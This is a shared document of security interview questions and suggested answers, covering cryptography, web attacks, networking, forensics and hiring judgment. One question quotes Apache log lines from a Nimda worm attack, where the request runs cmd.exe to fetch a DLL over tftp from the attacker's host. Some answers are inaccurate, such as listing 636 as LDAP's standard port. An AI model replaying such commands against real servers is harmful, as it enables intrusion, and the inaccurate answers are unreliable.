Security Interview Question

  • Upload
    dathihi

  • View
    220

  • Download
    0

Embed Size (px)

Citation preview

  • 8/3/2019 Security Interview Question

    1/6

    Security Interview Questions

    We've collected and composed a series of potential interview questions and answers. These can

    be used by HR/Managers to gauge the level of knowledge required for a security related position.

    While most of the questions do not have right or wrong answers, they can be used to furtherdelve into a candidates experience/knowledge. If you have some that you would like to add,

    please email them to us.

    What is NMAP? Security scanner originally written by Gordon Lyon (also known by his

    pseudonym Fyodor)

    In a public key infrastructure (PKI), the authority responsible for the identification and

    authentication of an applicant for a digital certificate (i.e., certificate subjects) is called

    what? Registration authority (RA)

    Whats the difference between encryption and hashing? Encryption is reversible, as long asyou have the appropriate key/keys, and the size of the cyphertext roughly matches the size of the

    plaintext. With hashing the operation is one-way, and the output is of a fixed length that is

    usually much smaller than the input.

    Whats the difference between Diffie-Hellman and RSA? Diffie-Hellman is a key-exchange

    protocol, and RSA is an encryption/signing protocol.

    What kind of attack is a standard Diffie-Hellman exchange vulnerable to? Man-in-the-

    middle, as neither side is authenticated.

    Cryptographically speaking, what is the main method of building a shared secret over apublic medium? Diffie-Hellman

    What is Key Escrow? (Also known as a fair cryptosystem) is an arrangement in which the keysneeded to decrypt encrypted data are held in escrow so that, under certain circumstances, an

    authorized third party may gain access to those keys.

    What does RSA stand for? I would be surprised if someone knew this answer: Rivest Shmair

    Adleman for Ronald L. Rivest, Adi Shamir and Leonard M. Adleman

    What is DES? Data Encryption Standard is a block cipher (a form of shared secret encryption)

    What is Triple DES? Common name for the Triple Data Encryption Algorithm (TDEA) blockcipher. Applies the DES cipher algorithm three time to each data block to increase the key size.

    What is the difference between Symmetric and Asymmetric? Single key vs. two keys

  • 8/3/2019 Security Interview Question

    2/6

    In public-key cryptography you have a public and a private key, and you often perform

    both encryption and signing functions. Which key is used for which? You encrypt with the

    other persons public key, and you sign with your own private.

    If you had to both encrypt and compress data during transmission, which would you do

    first, and why? Compress then encrypt. If you encrypt first youll have nothing but random datato work with, which will destroy any potential benefit from compression.

    How does HTTP handle state?It doesn't, thats why cookies were invented.

    What port does ping work over? ICMP is layer 3 and doesn't use ports

    How exactly does traceroute/tracert work at the protocol level? Many people think that it

    first sends a packet to the first hop, gets a time. Then it sends a packet to the second hop, gets a

    time, and keeps going until it gets. The extra credit is the fact that Windows uses ICMP by

    default while Linux uses UDP.

    What exactly is Cross Site Scripting? A type of computer security vulnerability typically found

    in web applications which allow code injection by malicious web users into the web pagesviewed by other users.

    Whats the difference between stored and reflected XSS? Stored is on a static page or pulledfrom a database and displayed to the user directly. Reflected comes from the user in the form of

    a request (usually constructed by an attacker), and then gets run in the victims browser when the

    results are returned from the site.

    What are the common defenses against XSS? Input Validation/Output Sanitization, with

    focus on the latter.

    What is Cross-Site Request Forgery?When an attacker gets a victims browser to make

    requests, ideally with their credentials included, without their knowing. A solid example of thisis when an IMG tag points to a URL associated with an action, e.g. http://foo.com/logout/. A

    victim just loading that page could potentially get logged out from foo.com, and their browser

    would have made the action, not them (since browsers load all IMG tags automatically).

    How does one defend against CSRF? Logging out of sites and avoiding their "remember me"

    features can mitigate CSRF risk; not displaying external images or clicking links in "spam" or

    untrusted e-mails may also help. Requiring authentication in GET and POST parameters, not

    only cookies; Checking the HTTP Referer header; Ensuring there's no crossdomain.xml filegranting unintended access to Flash movies; and Limiting the lifetime of authentication cookies

    What kind of network (lab) do you have at home?Ive yet to meet a serious security guy whodoesnt have a considerable home lab or network

    As a corporate Information Security professional, whats more important to focus on:threats or vulnerabilities? Opinion-based, but the correct answer should be vulnerabilities as

  • 8/3/2019 Security Interview Question

    3/6

    this what we can control in a corporate environment as we have little control over the threats.

    Whats the difference between a risk and vulnerability? If a CISSP gets this wrong, movealong. Risk is dependent on a vulnerability where as a vulnerability is a weakness and risk is

    threat of an action or event. What is a Buffer Overflow? An anomaly where a process stores

    data in a buffer outside the memory the programmer set aside for it What is a NOP Sled? A

    sequence of NOP (no-operation) instructions (on x86 opcode 090) meant to "slide" the CPU'sinstruction execution flow to its final, desired, destination. Someone wants to test out a new

    product that works on a wireless network, how would you advise them to test out the

    product? This will give the you a really good idea on how well wireless security is known bythe candidate as well as how much they are willing to work with the business to test the new

    product. If they come up with a clean segregated network to test on that does not touch the main

    corporate network, or links to the internet in a DMZ type situation, that is promising. If they askfor a Faraday Cage, you might not have a winner here. A business team has developed this

    brand new web site that you just tested and found a number of XSS errors in, how wouldyou handle that? This will let the interviewer know if the candidate has any idea about web

    security and development. If they offer to work with the developers to solve the issue you have a

    good candidate, if the candidate says it is the developer's problem, and that they cannot helpthem or the business, then this might not be the candidate for you. Ask candidate to Design asecure network". This is meant to see how the candidate thinks, you can add something likedesign a secure network between two offices that is also optimized or has QoS for various

    protocols. Ask how they would they securely link two offices together? Protocol stack

    VPN solutions You might want to include trusted partners. What is your Blog URL? If theyhave a blog then you need to know what they blog about, if they blog about tech that means they

    live, eat and breath this stuff, and that is good. If they are slamming on their co-workers,

    families, friends, or general how they pulled one over on someone, this might not be the person

    for you. What is your MySpace page? You have to ask this one for the same reason that youask what their blog URL is, do they meet the needs of the company. I tend to dismiss the use of

    MySpace as something that I wouldn't want to have or know someone that uses it, but that's my

    opinion. What papers have you written? The answer to this is the same as the blog, if they

    don't blog, and they don't write then ask them what they are reading in the news, are they stayingup on the technology, if not, you might not have a winner here. What is the secret sauce to aCisco command? This will let you know if they have any hands on with a Cisco device at all,

    this can be important depending on what the security engineer will be doing. BTW the answer isTAB. What do you think of Teams? This is the ultimate people question; if they say they like

    teams, ask them why. If they say they like people, ask them why, what is it that drives their

    relationships with others. This opens up a whole line of questioning about how well they likepeople, how well they can train others, and their viewpoints on working with others. You really

    do want a social person or at least a person sociable enough for the company. What is the

    security threat level today at the Internet Storm Center (ISC)? You should know that it's

    almost always Green Are they in touch with the current situation? Ask them what their

    favorite security web sites are. You should at least hear one you already read, if not check them

    out (write them down) and see what they are like, are they deep geek techno security, or are they

    fluff fox news kind of stuff. Hand them a security scan of a network and ask them to

    interpret it. This is always good to see if they know what they are looking at, and can derive

    information from it. Hand them a web site security scan and ask them to interpret it. This is

    always good to see if they know what they are looking at, and can derive information from it

  • 8/3/2019 Security Interview Question

    4/6

    Show them a security policy from the company, and ask how they would enforce it. This is

    always good, you find out what kind of leader they are, do they intend on teaching andenforcement, or do they go right to punitive damages Show them a hack attack against

    something, down to the packet level, and ask what they would do. You have to hand them

    the entire attack, not just snippets of info. Find out what they know and can they interpret

    information well enough to be of use to the employer. What is their dream informationsecurity job? This is always good to find out how ambitious they are, where they see themselves

    in a while, and determine to see if there is a good fit between the job and the candidate. Ask

    them to explain SOX, HIPAA, PCI and GLB (if applicable).What do you see as the mostcritical and current threats effecting Internet accessible websites? Goal of question is to

    gauge the applicants knowledge of current web related threats. Topics such as Denial of Service,

    Brute Force, Buffer Overflows, and Input Validation are all relevant topics. Hopefully they willmention information provided by web security organizations such as the Web Application

    Security Consortium (WASC) or the Open Web Application Security Project (OWASP). Whatdo you see as challenges to successfully deploying/monitoring web intrusion detection? You

    are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS

    issues such as: Limitations of NIDS for web monitoring (SSL, semantic issues withunderstanding HTTP) Proper logging increasing the verboseness of logging (Mod_Security

    audit_log) Remote Centralized Logging Alerting Mechanisms Updating Signatures/Policies

    What are the most important steps you would recommend for securing a new web server?There is no right or wrong answer. However, the following are good starting points:

    Update/Patch the web server software Minimize the server functionality disable extra modules Delete default data/scripts Increase logging verboseness Update Permissions/Ownership of

    files What are the most important steps you would recommend for securing a new Webapplication? Make sure Input Validation is enforced within the codeSecurity QA testing

    Ensure application is configured to display generic error messages Implement a softwaresecurity policy Remove or protect hidden files and directories Imagine that we are running

    an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS

    server. What does the log entry suggest has happened? What would you do in response to

    this entry? 68.48.142.117- [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-" 68.48.142.117- [09/Mar/2004:22:23:48 -0500]

    "GET /c/winnt/system32/ cmd.exe?/c+tftp%20-

    %2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 566 "-" "-" You willknow if the applicant is fluent at reading web server log files in the Common Log Format (CLF).

    In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These

    requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While itdoes not impact Apache, the logs do indicate that the initial request was successful (status code

    of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect

    the target) if the initial request is successful. Depending on the exact proxying rules in place, it

    would be a good idea to inspect the internal IIS server to verify that it has not beencompromised. What is SSL? SSL is cryptographic protocols that provide security and data

    integrity for communications over networks such as the Internet. TLS and SSL encrypt the

    segments of network connections at the Transport Layer end-to-end. How do you create SSL

    certificates, generically speaking? To create a certificate, you generate a private key, generate a

    Certificate Signing Request, Generate and install the Certificate. What is DNS Hijacking? DNS

    hijacking is the practice of hijacking the resolution of DNS names to IP addresses by the use of

  • 8/3/2019 Security Interview Question

    5/6

    rogue DNS servers, particularly for the practice of phishing What are IDA and/or Olly?

    Debuggers Have you hacked any system? This is a unique question in that for some companies

    the answer should always be NO as many companies has hire-no-hacker policy. If they start

    answering by indicating a legal or ethical engagement, then you might want to delve into this a

    little more. Have you released any worm/trojan/malicious code in the wild? Most definitely

    this answer should always be NO." If i give you two dlls of different versions, one has thevulnerability and another is patched for that vulnerability then how will you find thevulnerability? Load them up in a debugger to determine which is which. Validate the

    vulnerability by Googling, Microsoft, Secunia, etc. What is the latest security breach youre

    aware of? The goal is to gauge if the candidate is up on data breach disclosure. Can a VirtualOperating System be compromise? The obvious answer is yes, so mix it up with a follow-up

    about the Host operating system being compromised from a guest. If they have no idea what a

    guest or host is then they dont understand Virtualization security. What sort of test would you

    perform to understand a virus? The idea here is to see if the candidate has an understanding

    of using a sandbox or external website for virus analysis. What is UPX? The Ultimate Packer

    for eXecutables, is a free and open source executable packer supporting a number of file formats

    from different operating systems. What is meterpreter? Meterpreter is a command lineprogram that extends the functionality of Metasploit. What is LDAP? LDAP (Lightweight

    Directory Access Protocol) is a protocol for communications between LDAP servers and LDAPclients. LDAP servers store "directories" which are access by LDAP clients. Why LDAP called

    Light weight? LDAP is called lightweight because it is a smaller and easier protocol which

    was derived from the X.500 DAP (Directory Access Protocol) defined in the OSI networkprotocol stack. What are the standard port numbers for SMTP, POP3, IMAP4, RPC, LDAP

    and Global Catalog? The standard port numbers are respectively SMTP 25,POP3 110, IMAP4

    143,RPC 135, LDAP 636,GLOBAL CATALOG 3269 How will you determine if a file is

    packed or not? There are numerous tools available to determine what packed a file: PEiD is acommon tool that detects a large number of packers. File Checksum Checking Services

    Cumulative Anti Virus Testing: Virus Total , NoVirusThanks, Threat Expert, and Jotti Do youhave Rainbow tables? This may or may not be of importance, but if you're looking for a true

    pentester, the answer had better be yes. What is dsniff? This is a good question to determinewhat they know about network auditing and penetration testing tools. Have you ever used FTK,Encase, dc3dd, dd_rescue or dcfldd? This is used to determine if the candidate has any

    forensics experience. Other than Wireshark, what sniffers have you used? Here were lookingfor tcpdump, or something commercial. Tell me what you know about Sleuthkit. Sleuthkit is

    an open source disk analysis/forensics frontend for autopsy. With regard to forensics, what is

    physically different about how the platters are used in a 3.5 and a 2.5 HDD? The platters

    are written outside to inside on a 3.5 drive, where they inside (closest to the spindle) is written

    first on a 2.5 drive. What are DCO and HPA? DCO is Device Configuration Overlay and

    HPA is Host Protected Area. These are areas on a hard drive that are designed to store

    information in such a way that it cannot be easily modified changed or access by the user, BIOSor OS. Can DCO and HPA be changed? There is a tool called TAFT that can do this by talking

    directly to the ATA controller. There are numerous tools to remove HPA and DCO. Describe atime when you implemented defense in depth. The goal here is to get the candidate to talkabout multiple layers of security, like an onion. What was the last course you attend? Where?

    When? Why? Has the candidate attended any training recently? Describe the last securityimplementation you were involved with. The goal here is to get the candidate to talk about

  • 8/3/2019 Security Interview Question

    6/6

    their involvement with the implementation of a security product, imitative or design. Design a

    RADIUS infrastructure for 802.11 security and authentication. Goal of question here is to

    gauge the applicants knowledge of RADIUS. Do they use Realms? What was the last

    technical book you read? Goal of question here is to gauge the applicants desire to gain

    knowledge outside of work. What is your CISSP number?Check the status of the candidates

    certification. How would you decode the following packet in HEX? 4500 0036 308b 00004001 0000 7f00 0001 7f00 0001 0800 89f3 5a27 0200 3173 7432 444d 6d65 6765 7473 41537461 7262 7563 6b73 6361 7264 Convert this from text to pcap using text2pcap, then open in

    Wireshark. What is a honeypot? A honeypot is a simply a system program or file that hasabsolutely no purpose in production. Therefore, we can always assume that if the honeypot is

    accessed, it is for some reason unrelated to your organization purpose. Are there limitations of

    Intrusion Detection Signatures? Signature based IDS provide a useful service to let anadministrator know that he/she has been or is being attacked they should not be relied upon. It is

    far too easy to fool or shut down an IDS machine for them to be utilized as the primary line of

    defense against intruders. What was ISO 17799 originally called? BS 7799 What areas does

    ISO 27001 and 27002 cover? ISO 27001 covers the requirements for Information security

    management systems. ISO 27002 covers the actual practice for information securitymanagement Define an incident? This is really a question that is intended to illicit the amount of

    knowledge as well as the ability to think quickly. Candidates should say something similar to anevent that could or actually does have an adverse effect on a company, department, or system. A

    good follow-up is to ask for an example of an incident that they were involved with and how

    they handled it. What is the difference between Encrypting and Encoding? In the simplestterms, it's the lack of a key. What can protect you 100% from attack? If the candidate says

    any of the following you need to end the interview: Firewalls, AV, IDS/IPS, Encryption,

    policies. The point is there isn't anything that can protect you 100% of the time.